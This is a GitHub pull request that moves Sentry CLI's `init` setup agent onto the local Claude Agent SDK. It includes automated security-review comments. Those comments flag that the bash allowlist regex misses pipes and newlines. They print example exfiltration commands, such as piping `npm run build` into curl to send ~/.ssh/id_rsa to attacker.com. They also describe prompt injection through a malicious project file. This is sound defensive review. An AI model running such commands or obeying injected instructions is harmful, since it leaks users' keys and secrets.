
feat(init): run the setup agent locally via the Claude Agent SDK#1143

Draft
betegon wants to merge 3 commits into
mainfrom
feat/init-local-agent
Conversation

@betegon

@betegon betegon commented Jun 26, 2026

Member

Summary

Replaces the remote Mastra workflow (suspend/resume over the network) with a
local coding agent powered by @anthropic-ai/claude-agent-sdk. The agent
inspects the project, fetches Sentry docs on demand, installs the SDK, and
applies changes locally. We keep all the pre-agent work (preflight, org/project
resolution, project creation, feature selection, UI) and drop the suspend/resume
protocol and @mastra/client-js.

Inspired by PostHog's wizard, which runs the same SDK locally.

Changes

  • New local agent runner (src/lib/init/agent/): drives query(), gates tools via canUseTool (.env block + bash allowlist), isolates from the user's Claude settings (settingSources: []).
  • Model traffic routes through the Sentry init gateway -> Vercel AI Gateway (ANTHROPIC_BASE_URL). SENTRY_INIT_ANTHROPIC_API_KEY is a BYO-key/self-host/dev escape hatch straight to Anthropic.
  • Docs are local and iterative: get_docs_by_keywords walks docs.sentry.io/doctree.json and fetches .md pages — the agent calls it as often as it needs (src/lib/init/docs/). No remote docs service.
  • Deterministic Xcode/pbxproj transforms (sentry-cocoa SPM, React Native build phases) ship as in-process tools the agent invokes when it detects the platform (src/lib/init/agent/framework/).
  • wizard-runner rewritten to the local flow; removed init-service-auth and the old suspend/resume test.
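The local docs lookup described in the list above could work roughly like the sketch below. The `DocNode` shape (`path`, `title`, `children`), the function name `findDocsByKeywords`, and the scoring are assumptions made for illustration; the real doctree.json schema and the tool's implementation are not shown in this description.

```typescript
// Hypothetical node shape; the real doctree.json schema may differ.
interface DocNode {
  path: string;
  title: string;
  children?: DocNode[];
}

// Depth-first walk collecting pages whose path or title mentions any keyword.
function findDocsByKeywords(
  root: DocNode,
  keywords: string[],
  limit = 5
): string[] {
  const needles = keywords
    .map((k) => k.toLowerCase())
    .filter((k) => k.length > 0);
  const hits: { path: string; score: number }[] = [];
  const stack: DocNode[] = [root];
  while (stack.length > 0) {
    const node = stack.pop() as DocNode;
    const haystack = `${node.path} ${node.title}`.toLowerCase();
    // Score = number of distinct keywords found in this node.
    const score = needles.filter((k) => haystack.includes(k)).length;
    if (score > 0) {
      hits.push({ path: node.path, score });
    }
    for (const child of node.children ?? []) {
      stack.push(child);
    }
  }
  // Highest score first; ties broken by path so the output is stable.
  hits.sort((a, b) => b.score - a.score || a.path.localeCompare(b.path));
  return hits.slice(0, limit).map((h) => h.path);
}
```

Because the function is pure, the agent can call it repeatedly with different keywords against one cached copy of the tree and only fetch the pages it ranks highest.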

Distribution / size

The SDK's JS is bundled at build time, but its per-platform native runtime is
not — the CLI stays fully bundled with zero runtime deps (check:no-deps). On
first init the native runtime is downloaded and cached under
~/.sentry/agent/<version>/<platform>/ (integrity-checked) and reused; running
from source uses the SDK's own binary and skips the download. So the shipped
artifacts barely grow; the heavy part is a one-time, per-machine, cached fetch.
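A minimal sketch of the cache layout and integrity check described above. The directory layout comes from the text; the helper names and the use of a hex SHA-256 digest are assumptions, since the description only says the download is "integrity-checked".

```typescript
import { createHash } from "node:crypto";
import * as path from "node:path";

// Cache layout from the description: ~/.sentry/agent/<version>/<platform>/
function runtimeCacheDir(
  home: string,
  version: string,
  platform: string
): string {
  return path.join(home, ".sentry", "agent", version, platform);
}

// Assumption: the expected digest is a hex-encoded SHA-256 of the download.
function matchesSha256(data: Uint8Array, expectedHex: string): boolean {
  const actual = createHash("sha256").update(data).digest("hex");
  return actual === expectedHex.toLowerCase();
}
```

Keying the directory on both version and platform means an SDK upgrade lands in a fresh directory instead of overwriting a runtime that an older CLI build may still be using.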

Measured on darwin-arm64 (other platforms similar):

| Artifact | Before (main) | After | Δ |
| --- | --- | --- | --- |
| Single binary (SEA) | 101 MB | 102 MB | +~1 MB |
| npm package, packed | 2.5 MB | 2.6 MB | +~0.1 MB |
| npm package, unpacked | 9.3 MB | 9.6 MB | +~0.3 MB |
| Bundle dist/index.cjs | 4031 KB | 4382 KB | +~351 KB |
| Agent runtime (native claude) | | ~62 MB download / ~210 MB on disk | not shipped; fetched once on first init, cached in ~/.sentry |

(For comparison, embedding the native runtime into the binary instead would take it to ~312 MB per platform, ~3x — which is why we download-and-cache.)

Test plan

  • pnpm typecheck, pnpm lint, pnpm check:deps, vitest run test/lib/init (376 + new agent/docs tests green).
  • Ran sentry init on 19 framework test projects (JS, Python, Cloudflare, native iOS, monorepos, large apps): 19/19 applied a working integration.
  • Runtime-verified data lands in Sentry: node-express (errors + traces) and flask (errors).
  • Verified from the compiled binary run outside any node_modules: first run downloads + caches the runtime (~/.sentry/agent/.../claude), subsequent runs reuse it.
  • Parity vs production (0.37.0 Mastra) on all 19: equivalent-or-better where prod succeeded; new also succeeded on 5 projects prod failed (monorepos it refused, a timeout, a prod bug); new is ~2-3x faster. New also declares the SDK in Python manifests where prod left it out.

Known gaps (follow-ups)

  • Monorepo app-selection isn't gated: the agent auto-picks an app instead of requiring --app like prod. Usually it picks well, but for strapi it chose the framework's own package. Needs the deferred app-listing + --app gating.
  • Package-manager detection is non-deterministic (one nextjs run used npm in a bun project). Worth pinning.
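One way to pin package-manager detection is to derive it from lockfiles before the agent runs, rather than letting the model infer it. This is a sketch, not the planned fix: `detectPackageManager` is a hypothetical helper, and the priority order between lockfiles is an assumption.

```typescript
type PackageManager = "bun" | "pnpm" | "yarn" | "npm";

// Checked in order, so a project with several lockfiles resolves the same way
// on every run. The ordering itself is an assumption.
const LOCKFILES: ReadonlyArray<[string, PackageManager]> = [
  ["bun.lockb", "bun"],
  ["bun.lock", "bun"],
  ["pnpm-lock.yaml", "pnpm"],
  ["yarn.lock", "yarn"],
  ["package-lock.json", "npm"],
];

// rootFiles: file names found in the project root (not full paths).
function detectPackageManager(
  rootFiles: readonly string[]
): PackageManager | undefined {
  const present = new Set(rootFiles);
  for (const [lockfile, manager] of LOCKFILES) {
    if (present.has(lockfile)) {
      return manager;
    }
  }
  // No lockfile: leave the decision to the caller.
  return undefined;
}
```

The result could then be passed to the agent as a fixed fact in its prompt, so the install command no longer depends on what the model happens to notice.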

Depends on getsentry/cli-init-api#182 (the gateway) being deployed. Merge/deploy the gateway first.

betegon and others added 2 commits June 26, 2026 10:03
Replace the remote Mastra workflow (suspend/resume over the network) with a
local coding agent powered by @anthropic-ai/claude-agent-sdk. The agent
inspects the project, fetches Sentry docs on demand, and applies changes
locally, so we no longer maintain a server-side workflow or the suspend/resume
protocol.

- model traffic routes through the Sentry init gateway to the Vercel AI
  Gateway (ANTHROPIC_BASE_URL); a SENTRY_INIT_ANTHROPIC_API_KEY escape hatch
  allows BYO-key / self-host / dev runs straight to Anthropic
- docs are served by a local, iterative get_docs_by_keywords tool that walks
  docs.sentry.io's doctree.json and fetches .md pages (no remote docs service)
- deterministic Xcode/pbxproj transforms (sentry-cocoa SPM, React Native build
  phases) ship as in-process tools the agent calls when it detects the platform
- drop @mastra/client-js and init-service-auth; readiness now checks the gateway

Co-authored-by: Cursor <cursoragent@cursor.com>
Unit tests for the local-agent tool gate (.env block, bash allowlist,
recursive-wizard guard) and the doctree lookup helpers (lib/feature path
mapping, seed-page discovery, path normalization).

Co-authored-by: Cursor <cursoragent@cursor.com>
@github-actions

github-actions Bot commented Jun 26, 2026

Contributor
PR Preview Action v1.8.1

🚀 View preview at
https://cli.sentry.dev/_preview/pr-1143/

Built to branch gh-pages at 2026-06-26 09:08 UTC.
Preview will be ready when the GitHub Pages deployment is complete.

*/
export function normalizeDocPath(path: string): string {
let p = path.trim();
if (p.startsWith(BASE_URL)) {

@sentry-warden sentry-warden Bot left a comment


Bash allowlist filter missing pipe and newline operators, enabling shell injection bypass

In src/lib/init/agent/permissions.ts, SHELL_OPERATOR_RE (/[;&`$()]/) omits |, >, <, and \n, so a prompt-injected command like npm run build | curl https://attacker.com -d @~/.ssh/id_rsa passes every guard (DANGEROUS_BASH_RE, SHELL_OPERATOR_RE, and the startsWith("npm run") prefix check) and executes as-is. Add |, >, <, and \n/\r to the operator regex.

Evidence
  • SHELL_OPERATOR_RE = /[;&`$()]/ in permissions.ts line 21 does not include |, >, <, or newline characters.
  • isAllowedBash('npm run build | curl https://evil.com -d @~/.ssh/id_rsa'): DANGEROUS_BASH_RE → false; SHELL_OPERATOR_RE.test(...) → false (no chars in [;&`$()]); startsWith('npm run') → true → allowed.
  • Newline injection also bypasses: 'npm install x\ncurl https://evil.com' starts with 'npm install' and contains no blocked characters.
  • The Bash tool is enabled in non-dryRun mode (runner.ts buildAllowedTools), and the agent reads user-controlled project files, making prompt injection a viable attack path.
  • A malicious repository file (e.g., a README or config) could inject an instruction causing the agent to issue a piped exfiltration command that the filter accepts.

Identified by Warden security-review
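The suggested fix might look like the sketch below. The first two regexes are copied from the diff context in this review; the widened SHELL_OPERATOR_RE follows the recommendation above. Two parts are assumptions: the SAFE_BASH_PREFIXES list is an illustrative subset (only npm run and npm install are mentioned here), and stripping a trailing 2>/dev/null before the operator scan is a guess at how SAFE_REDIRECT_RE is meant to be used.

```typescript
// Copied from the diff context in this review.
const DANGEROUS_BASH_RE =
  /(?:^|\s)(?:rm\s+-rf|git\s+reset|git\s+checkout|sudo|chmod\s+-R|chown\s+-R)(?:\s|$)/i;
const SAFE_REDIRECT_RE = /\s+2>\/dev\/null\s*$/u;
// Suggested hardening: also reject |, >, <, and line breaks.
const SHELL_OPERATOR_RE = /[;&`$()|<>\n\r]/;
// Assumption: illustrative subset; the real SAFE_BASH_PREFIXES is not shown.
const SAFE_BASH_PREFIXES = ["npm run", "npm install"];

function isAllowedBash(command: string): boolean {
  // Drop one trailing "2>/dev/null" first so it does not trip the ">" check.
  const stripped = command.replace(SAFE_REDIRECT_RE, "").trim();
  if (DANGEROUS_BASH_RE.test(stripped) || SHELL_OPERATOR_RE.test(stripped)) {
    return false;
  }
  // Require a whole-word prefix match so "npm runx" is not accepted.
  return SAFE_BASH_PREFIXES.some(
    (prefix) => stripped === prefix || stripped.startsWith(`${prefix} `)
  );
}
```

A character denylist like this remains fragile; parsing the command into an argv array and executing it without a shell would remove the operator problem entirely, at the cost of a larger change.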

const DANGEROUS_BASH_RE =
/(?:^|\s)(?:rm\s+-rf|git\s+reset|git\s+checkout|sudo|chmod\s+-R|chown\s+-R)(?:\s|$)/i;
const SAFE_REDIRECT_RE = /\s+2>\/dev\/null\s*$/u;
const SHELL_OPERATOR_RE = /[;&`$()]/;

@sentry-warden sentry-warden Bot Jun 26, 2026


Bash allowlist bypass: pipe operator not blocked allows arbitrary command chaining

The SHELL_OPERATOR_RE regex (/[;&`$()]/) used by isAllowedBash omits the pipe character |, so a command such as npm install | bash or npm run build | curl --data-binary @config.json https://attacker.com starts with an allowed prefix, contains no blocked operator, and is approved by canUseInitAgentTool. Because the shell executes the command on the right of the pipe, an attacker who injects instructions via a crafted project file (the agent reads project files under permissionMode: acceptEdits) can run arbitrary programs and exfiltrate data despite the allowlist.

Evidence
  • permissions.ts:20 defines SHELL_OPERATOR_RE = /[;&`$()]/, which does not include | (also missing > and newline).
  • isAllowedBash (line 87) blocks only on DANGEROUS_BASH_RE or SHELL_OPERATOR_RE, then requires a SAFE_BASH_PREFIXES prefix; npm install | bash matches the npm install prefix and has no blocked operator, so it returns true.
  • canUseInitAgentTool (line 132) returns allow for that command; the right side of the pipe is executed as an arbitrary program, defeating the allowlist's intent.
  • runner.ts:213 runs the agent with permissionMode: "acceptEdits" and Read/Grep allowed on non-.env paths, giving a prompt-injection path through attacker-supplied project files to trigger such Bash commands.
Also found at 4 additional locations
  • src/lib/init/agent/runner.ts:220-221
  • src/lib/init/constants.ts:20
  • src/lib/init/wizard-runner.ts:20-20
  • src/lib/init/wizard-runner.ts:408

Identified by Warden security-review, find-bugs · A66-C5D

Comment on lines +55 to +68
}
for (const [key, phase] of Object.entries(
  objects.PBXFrameworksBuildPhase
)) {
  if (key.endsWith("_comment") || typeof phase === "string") {
    continue;
  }
  const p = phase as PBXFrameworksBuildPhase;
  if (!p.files) {
    p.files = [];
  }
  p.files.push({ value: fwUUID, comment: "Sentry in Frameworks" });
}


Frameworks build phase patched for all targets but packageProductDependencies only added to application targets

fwUUID is pushed into every PBXFrameworksBuildPhase regardless of target type, but depUUID is added to packageProductDependencies only for com.apple.product-type.application targets. Any other target (e.g. a unit-test target) will end up with a PBXBuildFile whose productRef points to an XCSwiftPackageProductDependency that is not declared on that target, producing an Xcode validation error on the modified project.

Evidence
  • Lines 55–68 iterate objects.PBXFrameworksBuildPhase with no filter on target type and push fwUUID to every phase's files array.
  • Lines 71–84 iterate objects.PBXNativeTarget but skip any target whose productType is not '"com.apple.product-type.application"' before pushing depUUID into packageProductDependencies.
  • fwUUID is defined as { isa: 'PBXBuildFile', productRef: depUUID } (lines 46–49); Xcode requires that a PBXBuildFile.productRef pointing to an XCSwiftPackageProductDependency be declared in the referencing target's packageProductDependencies.
  • A standard iOS project with an XCTestBundle target has its own PBXFrameworksBuildPhase, so the mismatch affects virtually every real project.

Identified by Warden find-bugs · K8Y-YEB
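One possible shape for a fix is to walk application targets first and patch only the frameworks phases those targets reference, so the build file and the package dependency always land on the same target. This is a sketch under assumptions: the type names, the helper `linkSentryToAppTargets`, and the "Sentry" dependency comment are hypothetical, and the section layout (`_comment` keys, `buildPhases` as `{ value, comment }` references) is inferred from the snippet under review.

```typescript
type Ref = { value: string; comment?: string };
interface NativeTarget {
  productType?: string;
  buildPhases?: Ref[];
  packageProductDependencies?: Ref[];
}
interface FrameworksPhase {
  files?: Ref[];
}
// Parsed sections mix object entries with "<uuid>_comment" string entries.
type Section<T> = Record<string, T | string>;

const APP_PRODUCT_TYPE = '"com.apple.product-type.application"';

function linkSentryToAppTargets(
  targets: Section<NativeTarget>,
  phases: Section<FrameworksPhase>,
  fwUUID: string,
  depUUID: string
): void {
  for (const [key, target] of Object.entries(targets)) {
    if (key.endsWith("_comment") || typeof target === "string") {
      continue;
    }
    if (target.productType !== APP_PRODUCT_TYPE) {
      continue;
    }
    (target.packageProductDependencies ??= []).push({
      value: depUUID,
      comment: "Sentry", // assumed comment text
    });
    // Only phases owned by this application target receive the build file.
    for (const ref of target.buildPhases ?? []) {
      const phase = phases[ref.value];
      if (phase === undefined || typeof phase === "string") {
        continue; // not a frameworks phase (e.g. sources or resources)
      }
      (phase.files ??= []).push({
        value: fwUUID,
        comment: "Sentry in Frameworks",
      });
    }
  }
}
```

With this ordering, a unit-test target's frameworks phase is left untouched because no application target lists it in buildPhases.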

Comment thread src/lib/init/agent/tools.ts
The CLI ships fully bundled with zero runtime dependencies (npm package and
single binary alike), so the Claude Agent SDK's per-platform native runtime
(~62 MB download, ~210 MB on disk) can't ride along in node_modules. Download
it on first `init` and cache it under ~/.sentry/agent/<version>/<platform>, then
point the SDK at it via pathToClaudeCodeExecutable. Subsequent runs reuse the
cache; running from source (node_modules present) uses the SDK's own binary and
skips the download.

Keeps @anthropic-ai/claude-agent-sdk and xcode as bundled devDependencies so
the published package stays dependency-free (check:no-deps).

Co-authored-by: Cursor <cursoragent@cursor.com>